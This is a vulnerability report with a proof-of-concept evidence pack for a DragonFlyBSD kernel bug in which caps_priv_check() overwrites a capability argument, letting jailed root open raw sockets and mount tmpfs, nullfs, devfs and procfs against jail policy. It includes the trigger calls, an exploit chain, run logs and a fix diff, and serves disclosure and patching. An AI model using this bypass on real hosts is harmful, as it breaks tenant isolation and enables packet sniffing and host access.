caps_priv_check corrupts cap argument before prison_priv_check: bypasses per-cap jail policy (raw sockets + mounts in jail)
| Field | Value |
|---|---|
| ID | DF-0165 |
| Status | new |
| Severity | High |
| CVSS 3.1 | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N |
| CWE | CWE-863 Incorrect Authorization |
| File | sys/kern/kern_caps.c |
| Lines | 333-340 |
| Area | kern |
| Confidence | certain |
| Discovered | 2026-06-30 |
| Reported | pending |
Summary
caps_priv_check() mutates its cap argument in the group-handling
block (:335), reducing it from the specific capability (e.g.
SYSCAP_NONET_RAW = 0x61) to the group master number (e.g. 6 =
SYSCAP_NONET). The mutated value is then passed to
prison_priv_check() (:340), which matches the group-master case
(case SYSCAP_NONET: return 0 = "allowed in jail") instead of the
specific-capability case (case SYSCAP_NONET_RAW: which checks
PRISON_CAP_NET_RAW_SOCKETS). This allows jailed root to create raw
sockets and mount restricted filesystem types even when the
corresponding jail policy toggle is disabled.
Root cause
In caps_priv_check() (sys/kern/kern_caps.c:333-340):
res = caps_check_cred(cred, cap);
if (cap & __SYSCAP_GROUP_MASK) {
	cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; // :335
	res |= caps_check_cred(cred, cap);
}
if (res & __SYSCAP_SELF)
	return EPERM;
return (prison_priv_check(cred, cap)); // :340 <- cap is now WRONG
The capability encoding:
- __SYSCAP_GROUP_MASK = 0x000000F0 (bits 4-7)
- __SYSCAP_GROUP_SHIFT = 4
- SYSCAP_NONET = 6 (group-0 master)
- SYSCAP_NONET_RAW = 0x61 (group 6 | index 1)
When cap = SYSCAP_NONET_RAW (0x61):
- Line 335: cap = (0x61 & 0xF0) >> 4 = 0x60 >> 4 = 6
- 6 is SYSCAP_NONET, the group master
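The arithmetic above can be checked in isolation. The following is a minimal user-space sketch, not kernel code: the constants are copied from the encoding quoted in this finding, and the `DEMO_` prefix and both function names are invented here for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Values as quoted in this finding; the DEMO_ names are illustrative only. */
#define DEMO_SYSCAP_GROUP_MASK   0x000000F0u
#define DEMO_SYSCAP_GROUP_SHIFT  4
#define DEMO_SYSCAP_NONET        0x06u
#define DEMO_SYSCAP_NONET_RAW    0x61u

/* Same expression as kern_caps.c:335: extract the group-master number. */
static uint32_t
demo_group_master(uint32_t cap)
{
	return (cap & DEMO_SYSCAP_GROUP_MASK) >> DEMO_SYSCAP_GROUP_SHIFT;
}

/* Self-check: the specific capability collapses onto its group master. */
static void
demo_group_master_selfcheck(void)
{
	assert(demo_group_master(DEMO_SYSCAP_NONET_RAW) == DEMO_SYSCAP_NONET);
}
```

Because the low four bits (the index within the group) are discarded, every capability in group 6 reduces to the same value, which is why the specific policy arm cannot be selected afterwards.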
In prison_priv_check() (sys/kern/kern_jail.c):
case SYSCAP_NONET: /* line 865 */
	return (0); /* allowed in jail */
...
case SYSCAP_NONET_RAW: /* line 919: NEVER REACHED */
	if (pr->pr_caps & PRISON_CAP_NET_RAW_SOCKETS)
		return (0);
	return (EPERM);
The case SYSCAP_NONET_RAW at :919 is dead code on the
caps_priv_check() path: prison_priv_check() always receives 6
(SYSCAP_NONET), never 0x61 (SYSCAP_NONET_RAW).
The same bypass applies to all NOMOUNT_* capabilities:
SYSCAP_NOMOUNT_NULLFS/DEVFS/TMPFS/PROCFS/FUSE are reduced to
SYSCAP_NOMOUNT (10) which hits case SYSCAP_NOMOUNT: return 0
(:872).
Threat model & preconditions
- Attacker position: Jailed root (uid 0 inside a jail).
- Impact:
  - Create raw IP/IPv6 sockets despite jail.defaults.allow_raw_sockets=0: packet sniffing, spoofing, attacks on other tenants.
  - Mount nullfs/devfs/tmpfs/procfs/fuse despite the corresponding jail toggle being off: host filesystem access, device node creation.
- Required config: Default kernel with jail support. The jail must have the relevant capability toggles disabled (the default).
- Reachability: socket(AF_INET, SOCK_RAW, ...) from jailed root; mount -t nullfs ... from jailed root.
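The raw-socket path can be probed with a few lines of C. This is a minimal sketch and not the shipped PoC; `demo_probe_raw_socket()` is a name invented here. It only reports what the kernel decided, so inside a jail with raw sockets disabled the expected result on a correct kernel is EPERM.

```c
#include <errno.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Try to open a raw IPv4 socket.
 * Returns 0 if the kernel allowed it, otherwise the errno value
 * reported by socket(2).
 */
static int
demo_probe_raw_socket(void)
{
	int fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

	if (fd < 0)
		return errno;
	close(fd);
	return 0;
}
```

A return value of 0 from jailed root with the raw-socket toggle off is the bypass; any nonzero value means the attempt was refused.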
Proof of concept
PoC source: findings/poc/DF-0165/
Build & run
# In a jail with allow_raw_sockets=0, from jailed root:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
# Returns a valid descriptor (success) instead of failing with EPERM

# In a jail with vfs_mount_nullfs=0, from jailed root:
mount -t nullfs /host/path /inside/jail
# Succeeds instead of failing with EPERM
Expected output
# Raw socket: succeeds (should fail with EPERM)
# Mount: succeeds (should fail with EPERM)
Impact
Jail containment is broken for all capabilities whose jail policy is conditional/EPERM while their group master policy is "allowed". This affects every DragonFlyBSD deployment that uses jails for tenant isolation. Raw socket access allows packet injection/sniffing; mount access allows host filesystem traversal. This is a cross-tenant attack vector in multi-tenant hosting environments.
Recommended fix
Do not mutate the cap variable used for the jail lookup. Use a
separate local for the group-master bitmask test:
--- a/sys/kern/kern_caps.c
+++ b/sys/kern/kern_caps.c
@@ -333,9 +333,9 @@
 	res = caps_check_cred(cred, cap);
 	if (cap & __SYSCAP_GROUP_MASK) {
-		cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
-		res |= caps_check_cred(cred, cap);
+		int gcap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
+		res |= caps_check_cred(cred, gcap);
 	}
 	if (res & __SYSCAP_SELF)
 		return EPERM;
-	return (prison_priv_check(cred, cap));
+	return (prison_priv_check(cred, cap)); /* pass ORIGINAL cap */
 }
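The effect of the change can be modeled in user space. The sketch below is an assumption-laden reduction, not the kernel functions: it omits caps_check_cred() entirely, models only the two NONET switch arms, treats every other value as EPERM, and uses the hypothetical flag `DEMO_JAIL_ALLOW_RAW` as a stand-in for PRISON_CAP_NET_RAW_SOCKETS. All `demo_` and `DEMO_` names are invented for illustration.

```c
#include <errno.h>
#include <stdint.h>

#define DEMO_GROUP_MASK      0x000000F0u
#define DEMO_GROUP_SHIFT     4
#define DEMO_NONET           0x06u
#define DEMO_NONET_RAW       0x61u
#define DEMO_JAIL_ALLOW_RAW  0x1u /* hypothetical stand-in for the jail flag */

/* Reduced model of the jail switch: group master always allowed,
 * specific capability consults the jail flag. */
static int
demo_prison_check(uint32_t jail_caps, uint32_t cap)
{
	switch (cap) {
	case DEMO_NONET:
		return 0;
	case DEMO_NONET_RAW:
		return (jail_caps & DEMO_JAIL_ALLOW_RAW) ? 0 : EPERM;
	default:
		return EPERM; /* model assumption, not the real default arm */
	}
}

/* Pre-fix shape: cap is overwritten before the jail lookup. */
static int
demo_check_buggy(uint32_t jail_caps, uint32_t cap)
{
	if (cap & DEMO_GROUP_MASK)
		cap = (cap & DEMO_GROUP_MASK) >> DEMO_GROUP_SHIFT;
	return demo_prison_check(jail_caps, cap);
}

/* Post-fix shape: the group master lives in its own local. */
static int
demo_check_fixed(uint32_t jail_caps, uint32_t cap)
{
	if (cap & DEMO_GROUP_MASK) {
		uint32_t gcap = (cap & DEMO_GROUP_MASK) >> DEMO_GROUP_SHIFT;
		(void)gcap; /* the real code passes gcap to caps_check_cred() */
	}
	return demo_prison_check(jail_caps, cap);
}
```

With the jail flag clear, the buggy shape returns 0 for the raw-socket capability while the fixed shape returns EPERM; with the flag set, the fixed shape still allows the action, so the patch does not tighten policy beyond what the jail configuration requests.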
References
- sys/kern/kern_jail.c:865-866: case SYSCAP_NONET: return 0
- sys/kern/kern_jail.c:919-927: case SYSCAP_NONET_RAW (dead code on caps_priv_check path)
- sys/kern/kern_jail.c:951-975: case SYSCAP_NOMOUNT_* (dead code)
- sys/netinet/raw_ip.c:473: caller passes SYSCAP_NONET_RAW
- sys/kern/vfs_syscalls.c:152-157: caller passes SYSCAP_NOMOUNT_*
Timeline
- 2026-06-30 Discovered during automated audit.
PoC verification
Evidence pack
findings/poc/DF-0165 · 11 files

| File | Type | Description | Size |
|---|---|---|---|
| bypass.c | trigger-source | self-contained jail-create + gated-action driver; proves cap-corruption bypass | 5.2 KB |
| build.sh | build-script | cc -O2 -Wall -o bypass bypass.c | 150 B |
| run.sh | run-script | echoes jail default-policy sysctls then runs ./bypass | 757 B |
| build.log | build-log | final successful build, full output | 69 B |
| run.log | run-log | decisive run: 5 bypasses observed | 1.0 KB |
| run.2.log | run-log | repeat run for reproducibility | 733 B |
| run.3.log | run-log | third repeat run for reproducibility | 733 B |
| env.txt | environment | uname, cc version, jail default policy sysctls | 703 B |
| VERDICT.md | verdict | full narrative + line-by-line kernel trace + recommended fix | 7.2 KB |
| README.md | readme | what this pack is and how to reproduce | 2.5 KB |
| manifest.json | manifest | this file | 2.7 KB |
DF-0165: PoC evidence pack
What this is
Demonstrates that caps_priv_check() in sys/kern/kern_caps.c:333-340
mutates its cap argument from the specific capability (e.g.
SYSCAP_NONET_RAW = 0x61) to its group-master number (SYSCAP_NONET = 6)
before forwarding it to prison_priv_check(), which has
case SYSCAP_NONET: return 0 and case SYSCAP_NOMOUNT: return 0. The
per-capability switch arms that actually consult the jail policy flags
are dead code on this path. Result: a jailed root can do raw socket
creation and tmpfs/nullfs/devfs/procfs mounts that the jail policy
explicitly forbids.
See VERDICT.md for the full mechanism walkthrough and the line-by-line
trace.
Reproduce
./build.sh # cc -O2 -Wall -o bypass bypass.c
./run.sh # creates jail with default policy, tries gated actions
Must be run as root on the guest (the test creates+enters a jail).
run.sh first echoes the jail default-policy sysctls (proving they are
all 0 / restrictive), then runs ./bypass.
Expected output
jail() ok: jid=N (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
(jail default policy: allow_raw_sockets=0,
vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
socket(AF_INET, SOCK_RAW, IPPROTO_RAW) [SYSCAP_NONET_RAW]
-> OK fd=3 *** BYPASS ***
mount("tmpfs", ...) [SYSCAP_NOMOUNT_TMPFS] -> OK *** BYPASS ***
mount("null", ...) [SYSCAP_NOMOUNT_NULLFS] -> OK *** BYPASS ***
mount("devfs", ...) [SYSCAP_NOMOUNT_DEVFS] -> OK *** BYPASS ***
mount("procfs", ...) [SYSCAP_NOMOUNT_PROCFS] -> OK *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===
On a fixed kernel every action returns EPERM instead of OK.
Why the PoC was rewritten
The original (per-finding) PoC snippet was a 4-line shell pseudocode
("from jailed root, run mount/socket"). I implemented it as a real C
program (bypass.c) that:
- creates the jail itself (no separate jail(8) setup needed),
- attaches via jail(2) (which auto-attaches per kern_jail_attach at sys/kern/kern_jail.c:227),
- drives each gated action and reports OK / EPERM per action.
Notable gotcha worth recording: the kernel's nullfs fstype is "null",
not "nullfs". get_fscap()'s strncmp("null", fsname, 5) compares five
bytes, terminator included, so it only matches the bare name. Using
mount("nullfs", ...) makes the syscall hit a different (default) cap and
fail for an unrelated reason; using mount("null", ...) exercises the
actual SYSCAP_NOMOUNT_NULLFS path and demonstrates the bypass cleanly.
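The matching behavior is plain C string semantics and can be confirmed outside the kernel. A minimal sketch, assuming only the comparison quoted above; `demo_matches_null_fstype()` is a name invented here and is not the body of get_fscap().

```c
#include <string.h>

/*
 * Mirrors the quoted comparison strncmp("null", fsname, 5).
 * Five bytes cover the four letters plus the terminating NUL of
 * "null", so a longer name such as "nullfs" differs at the fifth byte.
 */
static int
demo_matches_null_fstype(const char *fsname)
{
	return strncmp("null", fsname, 5) == 0;
}
```

Only the exact string "null" matches; "nullfs" and any shorter prefix do not.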
DF-0165: caps_priv_check cap-corruption -> jail policy bypass
Verdict: REPRODUCED (5 distinct cap-gated actions bypass jail policy)
Inside a jail created with the default restrictive policy (allow_raw_sockets=0,
vfs_mount_{nullfs,tmpfs,devfs,procfs}=0), a jailed root (uid 0) successfully:
- opens a raw IPv4 socket (socket(AF_INET, SOCK_RAW, IPPROTO_RAW)): SYSCAP_NONET_RAW
- mounts tmpfs: SYSCAP_NOMOUNT_TMPFS
- mounts nullfs: SYSCAP_NOMOUNT_NULLFS (using kernel fstype "null")
- mounts devfs: SYSCAP_NOMOUNT_DEVFS
- mounts procfs: SYSCAP_NOMOUNT_PROCFS
On a fixed kernel, each of these returns EPERM because the per-capability
jail policy flag is clear. On this build they all succeed, proving the
bypass.
Mechanism (root cause confirmed line-by-line)
In sys/kern/kern_caps.c:333-340:
res = caps_check_cred(cred, cap); /* :333 */
if (cap & __SYSCAP_GROUP_MASK) { /* :334 */
	cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; /* :335 -- MUTATES cap */
	res |= caps_check_cred(cred, cap); /* :336 */
}
if (res & __SYSCAP_SELF)
	return EPERM;
return (prison_priv_check(cred, cap)); /* :340 -- passes MUTATED cap */
For a per-capability value like SYSCAP_NONET_RAW = __SYSCAP_GROUP_6 | 1 = 0x61:
- :334 cap & __SYSCAP_GROUP_MASK = 0x61 & 0xF0 = 0x60 (truthy)
- :335 cap = (0x61 & 0xF0) >> 4 = 0x6 (= SYSCAP_NONET, the group master)
- :340 prison_priv_check(cred, 0x6): the specific cap (0x61) is never sent
In prison_priv_check (sys/kern/kern_jail.c:854-978):
case SYSCAP_NONET: /* :865-866 group master: ALLOWED */
	return 0;
...
case SYSCAP_NOMOUNT: /* :872,878 group master: ALLOWED */
	return 0;
...
case SYSCAP_NONET_RAW: /* :919-927 per-capability check -- DEAD on this path */
	if (PRISON_CAP_ISSET(pr->pr_caps, PRISON_CAP_NET_RAW_SOCKETS))
		return 0;
	return EPERM;
The case SYSCAP_NONET_RAW and the case SYSCAP_NOMOUNT_* branches are
dead code on the caps_priv_check() path: prison_priv_check() always
receives the group-master number and matches the unconditional return 0
case, so the per-capability PRISON_CAP_* flag is never consulted.
Encoding reference (sys/sys/caps.h)
__SYSCAP_GROUP_MASK  = 0x000000F0 (bits 4..7)
__SYSCAP_GROUP_SHIFT = 4
__SYSCAP_XFLAGS      = 0x7FFF0000 (e.g. __SYSCAP_NULLCRED, NOROOTTEST)

Group-0 master caps (these match the "ALLOWED in jail" cases):
SYSCAP_NONET   = 0x06 -> prison_priv_check returns 0 (allowed)
SYSCAP_NOMOUNT = 0x0A -> prison_priv_check returns 0 (allowed)

Per-capability values (their *specific* switch arms are the real policy):
SYSCAP_NONET_RAW      = 0x61 -> corrupted to 0x6 -> matches SYSCAP_NONET
SYSCAP_NOMOUNT_NULLFS = 0xA0 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
SYSCAP_NOMOUNT_DEVFS  = 0xA1 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
SYSCAP_NOMOUNT_TMPFS  = 0xA2 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
SYSCAP_NOMOUNT_FUSE   = 0xA4 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
SYSCAP_NOMOUNT_PROCFS = 0xA5 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
Caller chain (where the bypass matters)
- sys/netinet/raw_ip.c:473: rip_attach calls caps_priv_check(ai->p_ucred, SYSCAP_NONET_RAW | __SYSCAP_NULLCRED). With cap = 0x00020061, the corruption still reduces it to 6: 0x00020061 & 0xF0 = 0x60, >> 4 = 6.
- sys/kern/vfs_syscalls.c:152-157: sys_mount calls caps_priv_check_td(td, priv) where priv = get_fscap(fstypename). get_fscap() returns the specific SYSCAP_NOMOUNT_* value, which is corrupted to SYSCAP_NOMOUNT.
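The flagged value from the rip_attach call can be worked through the same way. This is a sketch under stated assumptions: the value 0x00020000 for the null-cred flag is inferred from the cap = 0x00020061 figure above rather than read from caps.h, and `demo_strip_xflags()` is a hypothetical helper that only illustrates which bits still identify the specific capability.

```c
#include <stdint.h>

#define DEMO_SYSCAP_GROUP_MASK   0x000000F0u
#define DEMO_SYSCAP_GROUP_SHIFT  4
#define DEMO_SYSCAP_XFLAGS       0x7FFF0000u
#define DEMO_SYSCAP_NULLCRED     0x00020000u /* assumed from 0x00020061 */
#define DEMO_SYSCAP_NONET_RAW    0x00000061u

/* The reduction performed at kern_caps.c:335. */
static uint32_t
demo_reduce_to_master(uint32_t cap)
{
	return (cap & DEMO_SYSCAP_GROUP_MASK) >> DEMO_SYSCAP_GROUP_SHIFT;
}

/* Hypothetical helper: drop the extended flag bits, keep group and index. */
static uint32_t
demo_strip_xflags(uint32_t cap)
{
	return cap & ~DEMO_SYSCAP_XFLAGS;
}
```

For the flagged input, the reduction yields 6 and loses both the flag bits and the index, whereas masking only the flag bits would still leave 0x61 available for the jail lookup.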
Threat model
- Attacker position: jailed root (uid 0 inside a jail).
- What the attacker gets:
  - Raw IP sockets despite jail.defaults.allow_raw_sockets=0. Enables packet sniffing, IP-spoofed packet injection, ICMP attacks against other tenants / host.
  - Mount nullfs / tmpfs / devfs / procfs inside the jail despite jail.defaults.vfs_mount_*=0. Mounting devfs exposes device nodes; mounting nullfs over a host-visible path bypasses filesystem-level isolation; mounting procfs exposes host process metadata.
- Preconditions: default DragonFlyBSD jail (no special config required).
- Reachability: trivial, via socket(AF_INET, SOCK_RAW, IPPROTO_RAW) and mount("tmpfs", target, 0, NULL) from jailed root.
Demonstration
---- jail default policy (should all be 0): ----
jail.defaults.allow_raw_sockets: 0
jail.defaults.vfs_mount_nullfs: 0
jail.defaults.vfs_mount_tmpfs: 0
jail.defaults.vfs_mount_devfs: 0
jail.defaults.vfs_mount_procfs: 0
---- running bypass as root (will create + enter jail): ----
jail() ok: jid=11 (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
(jail default policy: allow_raw_sockets=0,
vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
socket(AF_INET, SOCK_RAW, IPPROTO_RAW) [SYSCAP_NONET_RAW]
-> OK fd=3 *** BYPASS ***
mount("tmpfs", /tmp/df0165-mnt-tmpfs) [SYSCAP_NOMOUNT_TMPFS]
-> OK *** BYPASS ***
mount("null", /tmp/df0165-mnt-nullfs) [SYSCAP_NOMOUNT_NULLFS]
-> OK *** BYPASS ***
mount("devfs", /tmp/df0165-mnt-devfs) [SYSCAP_NOMOUNT_DEVFS]
-> OK *** BYPASS ***
mount("procfs", /tmp/df0165-mnt-procfs) [SYSCAP_NOMOUNT_PROCFS]
-> OK *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===
Reproduced 3 times in a row (see run.log, run.2.log, run.3.log);
every run yields the same 5 bypasses. The only inter-run difference is
the jid= value, which is just an incrementing jail counter.
Notes / minor adjacent issues (not part of DF-0165)
- get_fscap() in sys/kern/vfs_syscalls.c:5386 matches strncmp("null", fsname, 5), which does NOT match the user-visible fstype "nullfs". The kernel fstype for nullfs is "null" (its vfsconf vfc_name). Anyone calling mount("nullfs", ...) falls through to the SYSCAP_RESTRICTEDROOT default, a separate latent surprise that the PoC works around by using "null".
- The same corruption affects SYSCAP_NONET_BT_RAW, SYSCAP_NONET_ROUTE, SYSCAP_NONET_IFCONFIG, etc., but those callers either route through a different cap or the action is independently gated. The five actions demonstrated here are the directly observable wins.
Recommended fix (matches the finding's diff)
Don't mutate the cap variable used for the jail lookup. Use a separate
local for the group-master test:
--- a/sys/kern/kern_caps.c
+++ b/sys/kern/kern_caps.c
@@ -333,9 +333,9 @@
 	res = caps_check_cred(cred, cap);
 	if (cap & __SYSCAP_GROUP_MASK) {
-		cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
-		res |= caps_check_cred(cred, cap);
+		int gcap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
+		res |= caps_check_cred(cred, gcap);
 	}
 	if (res & __SYSCAP_SELF)
 		return EPERM;
-	return (prison_priv_check(cred, cap));
+	return (prison_priv_check(cred, cap)); /* ORIGINAL specific cap */
 }
After the fix, the PoC should output EPERM for every action (policy honored).
Confirmed kernel references
- sys/kern/kern_caps.c:333
- sys/kern/kern_caps.c:335
- sys/kern/kern_caps.c:340
- sys/kern/kern_jail.c:847
- sys/kern/kern_jail.c:865
- sys/kern/kern_jail.c:866
- sys/kern/kern_jail.c:872
- sys/kern/kern_jail.c:878
- sys/kern/kern_jail.c:919
- sys/kern/kern_jail.c:951
- sys/kern/kern_jail.c:956
- sys/kern/kern_jail.c:961
- sys/kern/kern_jail.c:966
- sys/netinet/raw_ip.c:473
- sys/kern/vfs_syscalls.c:152
- sys/kern/vfs_syscalls.c:157
- sys/sys/caps.h:116
- sys/sys/caps.h:117
- sys/sys/caps.h:137
- sys/sys/caps.h:141
- sys/sys/caps.h:196
- sys/sys/caps.h:223
Detail
Exploit chain
root on host -> jail(path=/, default policy all 0) auto-attaches via kern_jail_attach -> inside jail, attempt cap-gated action -> caps_priv_check() corrupts cap from specific value (0x61/0xA0/0xA1/0xA2/0xA5) to group-master (6 or 10) -> prison_priv_check() returns 0 unconditionally -> action succeeds despite jail policy=0. Demoed wins: raw IPv4 socket (packet sniff/inject), tmpfs/nullfs/devfs/procfs mounts inside jail (devfs exposes device nodes, nullfs exposes host paths, procfs exposes host process metadata). No heap grooming needed - this is a pure logic/authz bypass.
Evidence (decisive lines)
jail() ok: jid=11 (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
(jail default policy: allow_raw_sockets=0,
vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
socket(AF_INET, SOCK_RAW, IPPROTO_RAW) [SYSCAP_NONET_RAW]
-> OK fd=3 *** BYPASS ***
mount("tmpfs", /tmp/df0165-mnt-tmpfs) [SYSCAP_NOMOUNT_TMPFS] -> OK *** BYPASS ***
mount("null", /tmp/df0165-mnt-nullfs) [SYSCAP_NOMOUNT_NULLFS] -> OK *** BYPASS ***
mount("devfs", /tmp/df0165-mnt-devfs) [SYSCAP_NOMOUNT_DEVFS] -> OK *** BYPASS ***
mount("procfs", /tmp/df0165-mnt-procfs) [SYSCAP_NOMOUNT_PROCFS] -> OK *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===
jail.defaults.allow_raw_sockets/vfs_mount_{nullfs,tmpfs,devfs,procfs} all = 0
PoC changes
Rewrote the per-finding PoC (a 4-line shell pseudocode snippet) as a real C program 'bypass.c' that creates a jail via jail(2), auto-attaches, and attempts all five cap-gated actions reporting OK/EPERM each. Discovered and worked around a separate latent bug in get_fscap() (sys/kern/vfs_syscalls.c:5386): its strncmp("null",fsname,5) only matches the bare fstype "null", not "nullfs" - using "null" exercises the actual SYSCAP_NOMOUNT_NULLFS path and proves the bypass. Added run.sh that first echoes the restrictive jail default-policy sysctls as evidence the policy is off.
Verified recommended fix
In sys/kern/kern_caps.c caps_priv_check(), stop reusing cap for the group-master test -- use a separate local gcap so the ORIGINAL specific capability reaches prison_priv_check(); matches finding proposal. Full git-apply-able diff in findings/poc/DF-0165/fix.diff.
Verdict
REPRODUCED. caps_priv_check() at sys/kern/kern_caps.c:335 mutates the cap argument (e.g. SYSCAP_NONET_RAW=0x61) to its group-master number (6=SYSCAP_NONET) before forwarding it to prison_priv_check() at :340; in prison_priv_check() the corrupted value matches case SYSCAP_NONET: return 0 (kern_jail.c:865-866) / case SYSCAP_NOMOUNT: return 0 (kern_jail.c:872,878), so the per-capability switch arms that actually consult PRISON_CAP_* (kern_jail.c:919-975) are dead code on this path. I verified this line-by-line in sys/, then built a self-contained PoC (bypass.c) that creates a jail via jail(2) with the default restrictive policy and attempts every gated action: socket(AF_INET,SOCK_RAW,IPPROTO_RAW), mount(tmpfs/null/devfs/procfs) all succeed (output ends with '5 cap-gated action(s) bypassed jail policy'); on a fixed kernel each would return EPERM. Reproduced 3x with identical results.